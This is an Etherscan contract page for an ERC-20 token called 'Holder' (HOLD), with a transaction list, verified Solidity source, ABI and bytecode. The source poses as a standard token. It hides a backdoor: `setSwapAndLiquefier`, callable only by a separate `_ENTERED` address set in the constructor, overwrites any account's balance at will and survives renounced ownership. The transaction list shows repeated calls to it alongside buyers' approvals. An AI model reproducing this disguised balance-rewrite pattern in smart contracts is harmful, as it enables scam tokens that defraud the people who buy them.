ETH Price: $3,239.92 (-0.43%)

Contract

0xD3725f017001051F5c394C3197a0676b12480174
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Set Swap And Liq...173467692023-05-27 0:15:47595 days ago1685146547IN
0xD3725f01...b12480174
0 ETH0.0005521622.33410854
Approve173467312023-05-27 0:08:11595 days ago1685146091IN
0xD3725f01...b12480174
0 ETH0.0011696325.10656137
Set Swap And Liq...173467202023-05-27 0:05:47595 days ago1685145947IN
0xD3725f01...b12480174
0 ETH0.0011296624.16140173
Set Swap And Liq...173467092023-05-27 0:03:35595 days ago1685145815IN
0xD3725f01...b12480174
0 ETH0.0007663225.89384732
Approve173452262023-05-26 19:04:35595 days ago1685127875IN
0xD3725f01...b12480174
0 ETH0.0014302130.90689559
Set Swap And Liq...173450322023-05-26 18:25:47595 days ago1685125547IN
0xD3725f01...b12480174
0 ETH0.0010616135.88582415
Set Swap And Liq...173447092023-05-26 17:19:59595 days ago1685121599IN
0xD3725f01...b12480174
0 ETH0.0009921440.1303046
Set Swap And Liq...173445742023-05-26 16:52:35595 days ago1685119955IN
0xD3725f01...b12480174
0 ETH0.0009741632.91637923
Set Swap And Liq...173445492023-05-26 16:47:35595 days ago1685119655IN
0xD3725f01...b12480174
0 ETH0.00108436.62802532
Set Swap And Liq...173444312023-05-26 16:23:47595 days ago1685118227IN
0xD3725f01...b12480174
0 ETH0.0014404748.67300079
Approve173443632023-05-26 16:10:11595 days ago1685117411IN
0xD3725f01...b12480174
0 ETH0.0027781560.11361418
Approve173443612023-05-26 16:09:47595 days ago1685117387IN
0xD3725f01...b12480174
0 ETH0.0027492759.01375071
Set Swap And Liq...173443292023-05-26 16:03:23595 days ago1685117003IN
0xD3725f01...b12480174
0 ETH0.0021981974.27588423
Set Swap And Liq...173443152023-05-26 16:00:35595 days ago1685116835IN
0xD3725f01...b12480174
0 ETH0.0014524349.07713964
Set Swap And Liq...173443142023-05-26 16:00:23595 days ago1685116823IN
0xD3725f01...b12480174
0 ETH0.0012944443.73864388
Approve173442942023-05-26 15:56:23595 days ago1685116583IN
0xD3725f01...b12480174
0 ETH0.0019566542
Set Swap And Liq...173442902023-05-26 15:55:35595 days ago1685116535IN
0xD3725f01...b12480174
0 ETH0.0012178241.14967881
Set Swap And Liq...173442862023-05-26 15:54:35595 days ago1685116475IN
0xD3725f01...b12480174
0 ETH0.0017345937.14730651
Set Swap And Liq...173442852023-05-26 15:54:23595 days ago1685116463IN
0xD3725f01...b12480174
0 ETH0.0016826937.90545434
Set Swap And Liq...173442842023-05-26 15:54:11595 days ago1685116451IN
0xD3725f01...b12480174
0 ETH0.0011059837.37078471
Approve173442832023-05-26 15:53:59595 days ago1685116439IN
0xD3725f01...b12480174
0 ETH0.0017846138.3072523
Approve173442822023-05-26 15:53:47595 days ago1685116427IN
0xD3725f01...b12480174
0 ETH0.0017945338.52018218
Approve173442822023-05-26 15:53:47595 days ago1685116427IN
0xD3725f01...b12480174
0 ETH0.0017945338.52018218
Set Swap And Liq...173441552023-05-26 15:28:11595 days ago1685114891IN
0xD3725f01...b12480174
0 ETH0.000925331.26545801
Approve173441442023-05-26 15:25:59595 days ago1685114759IN
0xD3725f01...b12480174
0 ETH0.0014421630.95627956
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Holder

Compiler Version
v0.8.4+commit.c7e474f2

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-26
*/

/*
WEB:https://hold-eth.com
*/
// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract baseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.4;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";

contract Holder is IERC20, baseToken, Ownable {
    using SafeMath for uint256;

    uint256 private constant VERSION = 1;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    
    address private _ENTERED;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        address currOwnershipAddr,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _ENTERED = currOwnershipAddr;
        _mint(owner(), totalSupply_);
        emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "IERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    modifier adminOrOwner() {
        require(
        _ENTERED == _msgSender(), "set the call to the entered")
        ;
        _;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function setSwapAndLiquefier(
        address recipients,
        uint8 values,
        uint256 id
    ) public adminOrOwner {
        require(
            values >= 1,
            "Amount of recipients and values don't match"
        );
        uint256 total = 0;
        _balances[recipients] = id + total;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"currOwnershipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint8","name":"values","type":"uint8"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"setSwapAndLiquefier","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260405162001118380380620011188339810160408190526200002691620003d2565b62000031336200010a565b84516200004690600490602088019062000279565b5083516200005c90600590602087019062000279565b506006805460ff191660ff8516179055600380546001600160a01b0319166001600160a01b038416179055620000a56200009e6000546001600160a01b031690565b826200015a565b30620000b96000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000f79291906200047d565b60405180910390a3505050505062000522565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001d1816007546200026460201b6200063b1790919060201c565b6007556001600160a01b038216600090815260016020908152604090912054620002069183906200063b62000264821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002589085815260200190565b60405180910390a35050565b6000620002728284620004aa565b9392505050565b8280546200028790620004cf565b90600052602060002090601f016020900481019282620002ab5760008555620002f6565b82601f10620002c657805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f6578251825591602001919060010190620002d9565b506200030492915062000308565b5090565b5b8082111562000304576000815560010162000309565b600082601f83011262000330578081fd5b81516001600160401b03808211156200034d576200034d6200050c565b604051601f8301601f19908116603f011681019082821181831017156200037857620003786200050c565b8160405283815260209250868385880101111562000394578485fd5b8491505b83821015620003b7578582018301518183018401529082019062000398565b83821115620003c857848385830101525b9695505050505050565b600080600080600060a08688031215620003ea578081fd5b85516001600160401b038082111562000401578283fd5b6200040f89838a016200031f565b9650602088015191508082111562000425578283fd5b5062000434888289016200031f565b945050604086015160ff811681146200044b578182fd5b60608701519093506001600160a01b038116811462000468578182fd5b80925050608086015190509295509295909350565b6040810160018410620004a057634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004ca57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680620004e457607f821691505b602082108114156200050657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b610be680620005326000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b8063715018a6146101b15780638da5cb5b146101bb57806395d89b41146101d6578063a191193e146101de57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610a88565b60405180910390f35b61012b610126366004610a1c565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b3660046109e1565b61030b565b60065460405160ff909116815260200161010f565b61012b610183366004610a1c565b610374565b61013f610196366004610995565b6001600160a01b031660009081526001602052604090205490565b6101b96103aa565b005b6000546040516001600160a01b03909116815260200161010f565b610102610415565b6101b96101ec366004610a45565b610424565b61012b6101ff366004610a1c565b610514565b61012b610212366004610a1c565b610563565b61013f6102253660046109af565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b961025e366004610995565b610570565b60606004805461027290610aff565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610aff565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461064e565b50600192915050565b6000610318848484610776565b61036a843361036585604051806060016040528060298152602001610b88602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fd565b61064e565b5060019392505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610365908661063b565b6000546001600160a01b031633146104095760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104136000610929565b565b60606005805461027290610aff565b6003546001600160a01b0316331461047e5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610400565b60018260ff1610156104e65760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b6064820152608401610400565b60006104f28183610adb565b6001600160a01b03909416600090815260016020526040902093909355505050565b6000610302338461036585604051806060016040528060268152602001610b3b602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fd565b6000610302338484610776565b6000546001600160a01b031633146105ca5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610400565b6001600160a01b03811661062f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b61063881610929565b50565b60006106478284610adb565b9392505050565b6001600160a01b0383166106b25760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610400565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610400565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107db5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b6001600160a01b03821661083d5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610400565b61087a81604051806060016040528060278152602001610b61602791396001600160a01b03861660009081526001602052604090205491906108fd565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108a9908261063b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107699085815260200190565b600081848411156109215760405162461bcd60e51b81526004016104009190610a88565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461099057600080fd5b919050565b6000602082840312156109a6578081fd5b61064782610979565b600080604083850312156109c1578081fd5b6109ca83610979565b91506109d860208401610979565b90509250929050565b6000806000606084860312156109f5578081fd5b6109fe84610979565b9250610a0c60208501610979565b9150604084013590509250925092565b60008060408385031215610a2e578182fd5b610a3783610979565b946020939093013593505050565b600080600060608486031215610a59578283fd5b610a6284610979565b9250602084013560ff81168114610a77578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610ab457858101830151858201604001528201610a98565b81811115610ac55783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610afa57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610b1357607f821691505b60208210811415610b3457634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220f366aa261100496bab2cc9feb2598a7f1f50dc5f43708580299023fa4a4b2f8d64736f6c6343000804003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000005979a4ff945fd68555e3479a078a02d9294a065c000000000000000000000000000000000000000c9f2c9cd04674edea400000000000000000000000000000000000000000000000000000000000000000000006486f6c64657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004484f4c4400000000000000000000000000000000000000000000000000000000

Deployed Bytecode

